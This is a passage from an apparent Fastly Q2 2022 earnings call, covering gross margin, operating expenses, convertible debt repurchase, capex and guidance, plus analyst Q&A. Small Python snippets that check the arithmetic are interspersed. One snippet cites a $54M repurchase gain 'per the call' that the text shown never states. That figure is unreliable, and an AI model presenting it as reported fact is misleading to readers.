Fourth, we have improved our controls around cost of revenues and made adjustments to our accounting for free developer and charitable organization accounts and recorded a onetime Q1 true-up to our cost of revenues of approximately 160 basis points in the second quarter. And lastly, for the second half, we have put in place additional controls around hiring and non-headcount spending. As we previously shared, our expenses in 2022 were weighted to the first half of the year. And with these adjustments, we expect second half operating expenses to decline as compared to the first half. In addition, as we improved our cost controls, we experienced some onetime true-up of costs in the second quarter, primarily in sales and marketing.

I will now turn to the rest of our financial results for the second quarter. Our gross margin was 50.4% for the second quarter compared to 52.6% in the first quarter of 2022. This gross margin is below the flattish sequential level we anticipated during our last quarterly earnings call. This is primarily due to the onetime true-up to our cost of revenue I discussed above, as well as other smaller onetime items that, had they not occurred, would have led to an approximate decline of only 50 basis points sequentially. We realize the optics of this gross margin trend are unfavorable, and I want to confirm that we did not see any meaningful decrease in our pricing in Q2 compared to the first quarter. Our prior discussion on our network investments in the next-generation architecture remains intact, and we expect gross margin improvement in the second half. We continue to expect gross margin to increase meaningfully for the remainder of 2022, towards the low to mid-50s.
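For readers following the basis-point math, here is a small worked check in Python using only the figures stated on the call. The size of the "other smaller onetime items" was not disclosed, so it is treated here as the residual that closes the gap to the stated roughly 50 basis points.

# Reconciling the reported Q2 gross margin with the ~50 bps underlying decline.
q1_gross_margin = 0.526      # 52.6% reported for Q1 2022
q2_reported = 0.504          # 50.4% reported for Q2 2022
onetime_trueup = 0.016       # ~160 bps Q1 cost true-up recorded in Q2

q2_ex_trueup = q2_reported + onetime_trueup                  # ~52.0%
decline_bps = (q1_gross_margin - q2_ex_trueup) * 10_000      # ~60 bps

# The remaining ~10 bps gap to the stated ~50 bps decline is attributed to the
# "other smaller onetime items" mentioned on the call (size not disclosed).
print(f"Q2 ex-true-up: {q2_ex_trueup:.1%}; decline vs Q1: {decline_bps:.0f} bps")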

Operating expenses were $78.6 million in the second quarter, up 18% over Q2 2021 due to increased headcount across the organization, higher-than-expected salary increases, an acceleration in T&E expenses, increased investment in product and go-to-market activities, and as I previously mentioned, certain one-time expense items. We experienced several one-time expense items in Q2, primarily in sales and marketing that we do not expect to repeat in the second half of 2022. A little over half of the quarter-to-quarter increase in OpEx was due to one-time expense items in the quarter.

While we now anticipate operating expenses for 2022 to be higher than we planned at the beginning of the year, as we previously stated, we still expect expenses to be lower in the second half as compared to the first half. Our operating loss for the quarter was $26.9 million, and our net loss was $28 million or a $0.23 loss per basic and diluted share compared to an operating loss of $17.6 million, a net loss of $17.4 million and a $0.15 loss per basic and diluted share in Q2 2021.

Turning to the balance sheet, we ended the quarter with approximately $767 million in cash, cash equivalents, marketable securities and investments, including those classified as long term. During the quarter, we repurchased $235 million in aggregate principal amount of our convertible debt for $176.4 million or $0.75 on the dollar before related fees and transaction costs, reducing our debt balance to $703 million from $934 million. We will continue to use our balance sheet strategically to capitalize on low-risk opportunities that arise in the capital markets during these volatile periods.
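A minimal sketch of the repurchase arithmetic, using only the figures from the call. Attributing the gap between the face-value discount and the reported gain to related fees, transaction costs and unamortized issuance costs is an assumption; the breakdown was not disclosed.

# Convertible debt repurchase arithmetic from the figures stated on the call.
principal_repurchased = 235.0    # $M aggregate principal
cash_paid = 176.4                # $M, i.e. roughly $0.75 on the dollar
reported_gain = 54.0             # $M gain per the call

discount_to_face = principal_repurchased - cash_paid     # ~$58.6M
implied_costs = discount_to_face - reported_gain         # ~$4.6M (assumed: fees,
                                                         # transaction costs, and
                                                         # unamortized issuance costs)

print(f"Price per dollar of principal: {cash_paid / principal_repurchased:.2f}")  # ~0.75
print(f"Face-value discount: ${discount_to_face:.1f}M")
print(f"Implied fees and cost write-offs: ~${implied_costs:.1f}M")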

Our free cash flow reflects the impact of the advanced payments on capital equipment commitments of $29.3 million and capital expenditures of $15 million, which include cash purchases of capital equipment, capitalized internal use software and payments on finance leases in the quarter, resulting in a decrease in free cash flow to negative $61 million. Our cash capital expenditures were 11% of revenue in the second quarter, and our capital expenditures include capitalized software. This, along with our foundational technology, drives efficiency and leverage in our network, which is a competitive differentiator.

We previously shared that we made commitments for future equipment needs in early 2021 in response to supply chain challenges. As I discussed previously, as part of these commitments, we made advanced payments of $29.3 million in the second quarter, and we will be making additional advanced payments of approximately $16 million over the next three quarters to secure availability of this equipment and reduce ongoing carrying cost fees from these vendors.

We expect to take delivery of equipment covered by these commitments and deploy it over the remainder of 2022 and 2023. These payments will favorably impact our gross margin by reducing carrying costs, and we do not incur any operating costs, including depreciation, until we deploy this equipment. And despite our transition to our next-generation network architecture and the acceleration of some investments due to supply chain constraints, with the benefits from our improved capacity planning processes I previously discussed, we now expect our cash capital expenditures in 2022 to decline to a range of 10% to 12% of revenue from our previously expected range of 12% to 14%.

I will now turn to discuss the outlook for the third quarter and full year 2022. I’d like to remind everyone again that the following statements are based on current expectations as of today and include forward-looking statements. genuine results may differ materially, and we undertake no obligation to update these forward-looking statements in the future, except as required by law.

Our third quarter and full year 2022 outlook reflects our continued ability to deliver strong top line growth via improved customer acquisition and expansion within our enterprise customers, driven in part by new and enhanced products. Our revenue guidance is based on the visibility that we have today and given our usage-based business model, we expect to gain additional visibility to our annual guidance as the year progresses.

Historically, our first and second quarter revenues are generally flat with revenues increasing in the second half of the year. As a result, for the third quarter, we expect revenue in the range of $102 million to $105 million, representing 19% annual growth at the midpoint. We expect a non-GAAP operating loss of $21.5 million to $18.5 million and a non-GAAP loss per share of $0.18 to $0.15.

For the full year 2022, we are increasing our prior revenue guidance by $10 million to a range of $415 million to $425 million, representing 19% annual growth at the midpoint. We expect a non-GAAP operating loss of $78 million to $72 million and a non-GAAP net loss of $0.68 to $0.63 per share, reflecting the impact from the lower gross margins and higher expenses I discussed previously. And to reiterate, we anticipate gross margins to improve in the second half of 2022.
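As a consistency check on the "19% annual growth at the midpoint" framing, the sketch below backs out the year-ago revenue bases implied by the guidance ranges. The implied 2021 figures are derived from the guidance, not quoted on the call.

# Backing out the year-ago bases implied by the "19% at the midpoint" guidance.
q3_guide = (102.0, 105.0)    # $M, Q3 2022 revenue guidance range
fy_guide = (415.0, 425.0)    # $M, full year 2022 revenue guidance range
growth_at_midpoint = 0.19

q3_midpoint = sum(q3_guide) / 2                            # $103.5M
fy_midpoint = sum(fy_guide) / 2                            # $420.0M

implied_q3_2021 = q3_midpoint / (1 + growth_at_midpoint)   # ~$87.0M
implied_fy_2021 = fy_midpoint / (1 + growth_at_midpoint)   # ~$352.9M

print(f"Implied Q3 2021 revenue: ${implied_q3_2021:.1f}M")
print(f"Implied FY 2021 revenue: ${implied_fy_2021:.1f}M")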

Before we open the line for questions, we would like to thank you for your interest and your support in Fastly. Operator?

Question-and-Answer Session

Operator

[Operator Instructions] Your first question comes from the line of Frank Louthan with Raymond James. Your line is open.

Frank Louthan

Great. Thank you. So just to be clear on the gross margins, if you – adding back the charge you took, it would have been more like 46.5%, is that correct? And then I missed what you said the back half would be and does this mean that the upgrade you are doing there is finished and the back half is sort of the full benefit of that or can we still expect gross margins to ramp going into ‘23? Thank you.

Ron Kisling

Yes, this is Ron. Couple of things. On gross margin, if you back out kind of the one-time activities or adjustments, as we said, we would have been about 50 basis points below where we sort of guided, which was flat. So that would work out on a non-GAAP basis to be around 52% gross margins in the quarter, ignoring the one-time cost. As for the technology migration at our largest sites that is on track and is one of the drivers in the second half for improved gross margins as we are decommissioning the redundant sites that we put in place as we made this technology migration.

Frank Louthan

Okay, great. Thank you. And can you walk us through the acquisition and just how you expect that to boost your other offerings in the space? Thanks.

Joshua Bixby

Sure. Hey, Frank, it’s Joshua here. I think as we’ve said all along, as a platform for platform builders and as an organization that really supports developers, that journey doesn’t just start when you are ready as an enterprise to adopt the technology. We have known for the lifetime of our business that that journey starts when you start experimenting. When you have a problem at 2 o'clock in the morning that you can’t sleep and you are trying to solve, developers will wake up and they will try to solve problems. And so for us, the Glitch acquisition is incredibly important, because it continues that journey, and actually drives that journey earlier into the developer lifecycle. Glitch is a tool that, as we said, is used by 1 million plus developers who are out there solving problems. And really what Compute@Edge is designed for is to solve problems for these people who build platforms and who are delivering platforms. So we see it as being very important on the sales journey, and not only at that developer moment of inspiration, but that carries through the entire enterprise cycle. So, we believe it’s going to serve two main purposes, obviously, on the revenue side. But the other thing is, when you get so many people experimenting with the tools, you actually start to find new use cases. And the innovation of the community starts to become part of that innovation cycle. And one of the things that you’ve seen from the business over the last few quarters, and really highlighted this quarter, is that we are delivering – there were 14 important releases. We are accelerating. We are getting faster. And I’m really proud of the team for doing that. And when we look at a community of millions of people experimenting, that only accelerates that. So I think it really helps in both areas of the business. It’s very exciting.

Frank Louthan

Alright. Great. Thank you very much.

Joshua Bixby

Thanks, Frank.

Operator

Your next question comes from the line of Fatima Boolani with Citigroup. Your line is open.

Unidentified Analyst

Guys, this is Mark on for Fatima. Thanks for taking our questions. So it sounds like the strong expectations for the balance of the year. But can you provide a sense of the puts and takes and maybe key drivers of guidance for the second half that you’ve actually seen that gives you confidence for the robust outlook on the top line for the back half, especially in the current environment. Thanks.

Joshua Bixby

Yes. It’s Joshua here. I think that, as we talked about, when you look at the enterprise number for the quarter, what we’re seeing is that our largest customers, and those that are growing into that scale, are more optimistic, are in the middle of these transformations, and have large budgets. And so we are definitely seeing that side of the market, the market we really focus on, continuing to grow. And I think when you look at the guidance for the year and the quarter and the next quarter, what you see is that it’s really off the back of those large customers. So we acknowledge that there is uncertainty across the entire customer base, but within our larger, more established customers, we are definitely seeing more ability to plan farther out, and the projects that they are working on are central to their digital transformation. What we’ve seen historically in all of these times of economic upheaval is that people do invest in digital transformation. They do invest in the channels that are working and they invest in ways to innovate. Right now, those channels are on the Internet and the innovation is directly related to where the edge cloud provides so much value. Performance matters, security matters, and it matters even more in uncertain times. So I think it’s very much related to the momentum in the largest customers. That’s really why we’ve been able to raise guidance and we continue to see strength in the business. But by no means is it clear sailing from here. We absolutely see that there is uncertainty ahead of us.

Unidentified Analyst

Okay. Great, thanks for that. And then maybe just moving on to the security business, thank you for the high-level details, but maybe can we get an update on the momentum anything quantifiable would be much appreciated. Whether it’s year-over-year sequential growth on your assets there? And then just given your 1% increase on the average enterprise customer spend, when can we maybe see some more apparent ramp there on the security business, maybe adoption from the customers? Thanks.

Joshua Bixby

Sure. So on the customer spend side, I think that that’s a number that you have to look at over a longer period of time. There is puts and takes to that. I think overall, we’re going to continue to see that go up as you say, as our customers start to and continue to adopt the security offering, but also the compute offerings as well as other offerings. So what we continue to see, and I mentioned that with a few Fortune 500 customers who have broadly adopted across the portfolio and increase their usage. That’s a pattern that we’re seeing, and that will take some time to flow through. I think overall in the security business, Ron hit on the SigSci specific numbers. But if you go zoom out a little bit and look more broadly, what you’ll see is that momentum is broad. We continue to innovate in that product line. We talked about the introduction of our Security Labs product. We talked about some of the private relay work that we’re doing. I mean security is very much top of mind for our customers, and we continue to see wide adoption. One of the encouraging elements for me is how often the next-generation WAF platform is being leveraged into our largest accounts across all of our business units. So from media through to high tech, through to technology, we are seeing that absolutely be adopted even in areas where initially, when we acquired Signal Sciences, we weren’t sure how broad that adoption would be. So we have been pleasantly surprised, and you can see that from the growth in that particular product offering.

Unidentified Analyst

Perfect. Thank you guys so much.

Operator

Your next question comes from the line of Rudy Kessinger with D.A. Davidson. Your line is open.

Rudy Kessinger

Great, guys. Thank you for taking my questions. I joined a little bit late, so I apologize if you addressed this in your prepared remarks. But when I look at the guide for the year, you’re taking revenue up $10 million and you’re taking the operating loss guide down by $10 million. What are the puts and takes? I know you’re still saying gross margins will ramp in the second half. But if I look at that $10 million op loss reduction, how much of that is attributed to Glitch, to a lower gross margin outlook, or to increased OpEx spend on product or sales elsewhere? Just could you break it down for me?

Joshua Bixby

Sure. Ron, do you want to take that one?

Ron Kisling

Certainly. So I think there are a couple of drivers here. I think first, we did see Q2 operating expenses come in higher than we had planned at the beginning of the year. Some of that was driven by increased headcount across the organization; Glitch was a contributor to that increased headcount. We saw higher-than-expected salary increases, acceleration of T&E and increased investment in product and go-to-market activities in the first half, as well as certain one-time expense items. So when you look at the impact on the first half, we now anticipate that operating expenses for the year as a whole will be higher than we planned at the beginning of the year, although we still expect to see expenses down in the second half from the first half as we put in place a lot of controls around our spending and hiring levels. Largely, that increase in spending from those drivers is why we took up the operating loss ranges for the year, taking into account the increase in revenue. And from a gross margin perspective, while we still expect to see accretion in the second half, Q2 gross margins were lower than we had anticipated at the beginning of the quarter.

Rudy Kessinger

Got it. And then jumping to the gross margins, I mean, understanding there is a 160 basis point impact in Q2, so really only down 50 points sequentially. But if I take a step back and compare the gross margins to, say, Q1 of 2020 pre-COVID, they were 57.6% on a non-GAAP basis. And if I assume Signal Sciences is still about 80% gross margins, that would basically say that the rest of your business is running at about 46% gross margins, down about 12% from where you were pre-COVID. Understand you got some boost later in 2020 on gross margins. But I guess, just with the 12% kind of reduction in the rest of the business, what else is at play here besides the migration of some of your sites and the upgrades going on there and some pull forwards on CapEx? I have to imagine there has got to be some pricing pressure or mix shift in your business? What else is driving the gross margin compression?

Ron Kisling

Yes. I mean the big drivers, and we talked about this through 2021, were an increase in our investments in our network infrastructure, both in terms of investments in overall capacity as well as expansion internationally. And particularly with new international sites, when you initially deploy them, you’re running at less than full capacity, so those tend to be a drag on gross margin as well. So a lot of that was driven by the investments we made in the network over the last, say, year or 18 months. Prospectively, as we look at the network, one, because of the investments we’ve made and two, as we continue to improve our forecasting, we are able to align investments much more tightly with expected traffic. And so over time, we would expect capacity and traffic to come much more in line and drive improved gross margins as that invest-ahead-of-traffic dynamic is behind us.

Rudy Kessinger

Okay. Fair enough. Thanks for taking my questions.

Joshua Bixby

Thanks, Rudy.

Operator

Your next question comes from the line of Jim Fish with Piper Sandler. Your line is open.

Quinton Gabrielli

Hi, guys. This is Quinton on for Jim Fish. Thanks for taking our questions. Maybe just first, enterprise revenue growth seemed to dip slightly compared to Q1 despite similar enterprise additions as last quarter. Are you seeing enterprise customers maybe slowed down on spend a little bit or take longer to decide on net new spending or was there something else impacting the mix of commercial versus enterprise this quarter, like some of your smaller enterprises maybe moving into the higher end of the commercial bucket?

Joshua Bixby

Ron, do you want to take that?

Ron Kisling

Sure. So I guess you had a couple of different dynamics around enterprise customers. I think when you look at it over kind of the medium term, the numbers continue to point to strong business with our enterprise customers. While on a trailing 12-month basis their contribution was down slightly, by 1%, to 88% of total revenue from 89%, we did see an increase in new enterprise customers this quarter of 14, compared to 12 in the last quarter, and the average spend across our enterprise customers increased from $722,000 to $730,000. So we’re seeing a continued increase in terms of expansion within our enterprise customers. And growth in new enterprise customers is clearly a focus; we want to take that growth and look at how we accelerate it through the work that we’re doing in marketing, in terms of brand awareness and leads, and through the development of the sales organization.

Quinton Gabrielli

Okay. That’s helpful. And then maybe the last question from us is, we’ve heard from recent reports how the gaming vertical specifically has continued to slow, especially as we move through the summer. To what extent is this slowdown, along with slowing results from other verticals like streaming or e-commerce, baked into the rate outlook provided? Are we assuming things continue to improve in the back half of the year, or are current trends embedded into this guide? Thank you.

Joshua Bixby

Ron?

Ron Kisling

Yes. So as we look at guidance in the second half, I’d say we look at a couple of things. We look at the macro environment and certainly have taken into account what we believe the trends are across the key verticals that we play in as well as we look at what is the specific traffic that we expect to gain from our customers. We do a very detailed review of our customers in terms of what their plans are. And as we said, we’ve seen good expansion within those customers. And based on discussions with those customers, we’ve built out what we think are the traffic levels, our traffic shares are likely to be. And so it really is looking at our business, our traffic levels with our specific customers with recognition that the – it’s a challenging environment. And I think the – as we sort of said on the call, we continue to see rate expansion. We continue to see new customers in a challenging environment given our relative market share that does provide us some ability to sort of, if you will, mute some of the macro drivers.

Operator

Your next question comes from the line of Will Power with Baird. Your line is open.

Charlie Erlikh

Hi, guys. This is Charlie Erlikh on for Baird. Thanks for taking the question. I just wanted to ask about maybe asking another way the revenue guidance and it pertains to the growth algorithm. Are you seeing any sort of shift in growth contribution from maybe new bookings or new customers added to the platform versus growth from existing customers or has it been pretty consistent because we’ve heard from others that maybe existing customers are growing faster than new customer growth relative to past periods?

Ron Kisling

I think where – what we saw in the second quarter was really driven by growth within existing customers. And it was a combination of traffic as well as gaining new types of traffic and new types of business with those customers. So the expansion is really around both delivery and the types of services within those customers. We continue to see new customers. Enterprise customers did increase in the quarter. We added to our total customer base. But our core dynamic, if you look at our business, is typically that customers we add in the current year contribute 5% to maybe 7% of our revenue, because our customers do typically ramp and contribute and expand over time. And I would say that pattern that we’ve seen in the past is intact.

Charlie Erlikh

Okay. That makes sense. Also, I just wanted to ask if there was any changes in trends between like April versus May versus June and now July is behind us. Is there any change in the trend between those months or was it pretty consistent throughout?

Ron Kisling

I think what we saw, and this kind of mirrors kind of what you see from our revenue traffic. We started to see traffic trend up as we got toward the end of the quarter. And I think that’s fairly consistent with our overall pattern. Q1 and Q2 tend to be relatively flat. We start to see increased revenues in Q3 and further acceleration in Q4. And so traffic ramped as you moved through the quarter with higher traffic in June going into the summer months where we see the higher levels of traffic.

Charlie Erlikh

Got it. Alright. Thanks.

Joshua Bixby

Thanks, Charlie.

Operator

Your next question comes from the line of Philip Rigby with RBC Capital Markets. Your line is open.

Philip Rigby

Hi, great. Thanks for taking the question. I want to start with a follow-up on guidance. If I look at your guidance, it seems to imply a bit of a deceleration in 4Q. Is that just pertaining to the uncertainty that you talked about or are there other factors or assumptions in play there?

Ron Kisling

Yes, I’d say it’s primarily tied to kind of the uncertainty. I mean we’ve taken a strong view that we’re a usage-based business that creates some volatility. And so as we build our guidance, we take that into account. And certainly, as to the earlier question, we take into account kind of the macro trends that we’re seeing as well as the trends we’re seeing kind of on a micro basis within our own customer base.

Philip Rigby

Got it. Thanks. And then you mentioned increased salaries for employees, but I’m curious, if I look at where the stock is performing relative to some of the RSU issuances. I would be curious to hear your thoughts on stock-based comp for existing employees. Any changes in philosophy or strategies you’re thinking of taking there? Yes, any insight would be great. Thank you.

Ron Kisling

Yes. So yes, so no real change in philosophy. I think retaining employees has been really critical, particularly in this competitive environment. And I think we have used a combination of things. We talked a little bit about salary increases in the first half being a little higher than we anticipated. And we have used a combination of equity and salary to be competitive. I anticipate, just as you look at kind of the changes in the macro economy and the hiring environment, I expect the competitiveness in the hiring environment to become less competitive rather than more competitive as we kind of see the rest of the year based on where you are seeing kind of the economy and overall hiring statistics, which will certainly impact the level of competitiveness in the hiring environment.

Operator

Your next question comes from the line of Jeff Van Rhee with Craig-Hallum Capital. Your line is open.

Unidentified Analyst

Hi. This is Daniel on for Jeff Van Rhee. Just a quick question on developers and the traction there and Glitch. Just if you could provide us any additional color, walk us through, you said 100,000 incremental developers on the platform. Just any sort of sense of the scale of that relative to developers currently using Fastly or just any other metrics or color you have around developer momentum? Thanks.

Joshua Bixby

Yes, absolutely. When we acquired the platform, it was around 1.8 million, so if you add 100,000 in the quarter, you get a sense for how that’s scaling. One of the things that Glitch has done exceptionally well has been to be very intelligent about how it scales its community. So, instead of sort of opening the doors and encouraging everyone to come, they have been very thoughtful. This is a team that comes out of building some of the best developer-led products that the world has ever seen. So, they understand how that works. And one of the things that they have learned is that in order to build an exceptional developer community, you need to have exceptional features and you need to be listening to your community early and iterating. So, they followed that model. So, what we are seeing is a very consistent growth path. That’s what we saw very consistently over their history, and that’s what we will continue to see. Compared to Fastly’s history, these numbers are huge. I mean, if you look at what we were doing before Glitch, it was a fraction of this, and that’s what was so exciting about this deal for us: it just absolutely turbocharges our ability to get developers. One of the things that was also very important was that 60%, or in that range, of their developers really were enterprise developers. And so that also is a very important metric for us in terms of thinking about where the targets are, because we want all developers to use Fastly and we particularly want those that work in enterprises to use us.

Unidentified Analyst

Thanks.

Joshua Bixby

Thank you.

Operator

Your next question comes from the line of Tom Blakey with KeyBanc. Your line is open.

Tom Blakey

Hey guys. Thanks for taking the question. My question – I have a couple, I have a follow-up for Ron here. But my first question was on Compute@Edge and developers as well. We are at a couple of million, or almost a couple of million, developers now. How is Fastly thinking about incentivizing these developers to work on Compute@Edge? I am sure not all of them are well versed in that – just incentives there. And also maybe as an illustration, Joshua, what is that Japanese win? Like what are they working on? And what is kind of the economic opportunity alongside the app development platform? That’s my first question.

Joshua Bixby

Sure, that’s a great question. I think you are absolutely right. The edge is an area that is novel and new for a lot of developers. So it really starts with making sure those tools are available and giving people the financial leeway to experiment. So, we talked about a very successful program that we launched in Q4 and carried through to Q1. And we are still looking at ways where we can take the financial risk out of it in order for people to experiment. And the reason it’s beneficial to take the financial risk out is because – and it comes back to that question about use cases – it brings so much value. So we see customers dramatically reducing their central cloud bills. We see customers dramatically improving the performance of their applications. We see customers – like some of the examples we have stated earlier – whose sites are becoming significantly more personalized without playing off this consistent theme of, I could make it personalized, but it’s going to make it slow. What Compute@Edge brings is the ability to not make that trade-off. And those are the kinds of things that we are seeing, but it absolutely starts with this idea of experimentation and taking the risk out of it. And so that’s really what we see, and we see a lot of use cases which speak to bringing together the unique capabilities of Fastly, and which really come back to this idea of performance and scale and security. That’s what’s central to all of this.

Tom Blakey

Good answer. And it sounds like you have been incentivizing them. And then for Ron on the gross margin, sorry, Ron. But the – I think on the last call, we talked about mid-50s for the year in ‘22, now kind of low to mid. There are a lot of one-timers in here. That’s kind of a question, I suppose. And gauging the percentage of maybe one-timers going into the second half of ’22, what are you building Fastly for structurally in terms of what gross margins can be sustainable long-term, ‘23 and beyond? I think that would be helpful for everyone.

Ron Kisling

Yes. I think that’s a good question. And I think what I would look to, and I think it was referenced earlier, is if you kind of look back to the margins we saw in ‘21, there is an opportunity to get back to those margins as we get some of these one-time things behind us, with the efforts we put in place to better align our capacity investments with traffic on a go-forward basis. And then from there, you can see additional accretion over time as security grows as a share of revenue and as we add more Compute@Edge. So what I would say, maybe as a medium-term guideline, would be to look at kind of where we were in ‘21, and that’s attainable just by getting beyond some of this technology transition that we talked about last quarter and managing capacity in line with traffic, bringing those two closer in line.

Tom Blakey

That’s a great answer. Thanks for the clarity, Ron. Just as a clarification, last question for me: that 10% to 12% CapEx comment is impressive. Does that include – that can’t include the advanced payments on PP&E in ‘22. Does it, and…?

Ron Kisling

Correct. It does not include the advanced payments. When we take delivery of that and actually deploy it, we will include that in our cash CapEx. So, that’s when we actually take title of the equipment when we start depreciating it. So, as we take deliveries out of that, that will be reflected in our cash CapEx. We will take some deliveries from some of those commitments in the second half and so the deliveries against those purchase commitments are reflected in that outlook of 10% to 12% cash CapEx.

Tom Blakey

That’s interesting. And maybe it’s part of the upgrades that you are making to the network. Could you state now that you expect that range to kind of be consistent for at least the foreseeable future, like in the out years?

Ron Kisling

I mean I think, generally, I think as you look, absent any sort of other major sort of changes to the product, generally, I see that as the level. I mean ultimately, I think we are getting more efficient in terms of our capital deployment across the network, and that would be kind of a good sort of medium-term guide.

Tom Blakey

Very good. Thanks guys.

Ron Kisling

Thank you.

Operator

There are no further questions at this time. I would like to turn the call back to CEO, Joshua Bixby, for closing remarks.

Joshua Bixby

Thank you. Before we sign off, I want to thank our employees, customers, partners and investors. We remain as committed as ever to fueling and securing digital experiences. And moving forward, we remain focused on execution, bringing lasting growth to our business and delivering value to our shareholders. I will remain in my role until Todd joins and I look forward to supporting him. I want to reassure you that positioning Fastly for long-term success is my number one goal throughout this process. Thank you.

Operator

This concludes today’s conference call. You may now disconnect.
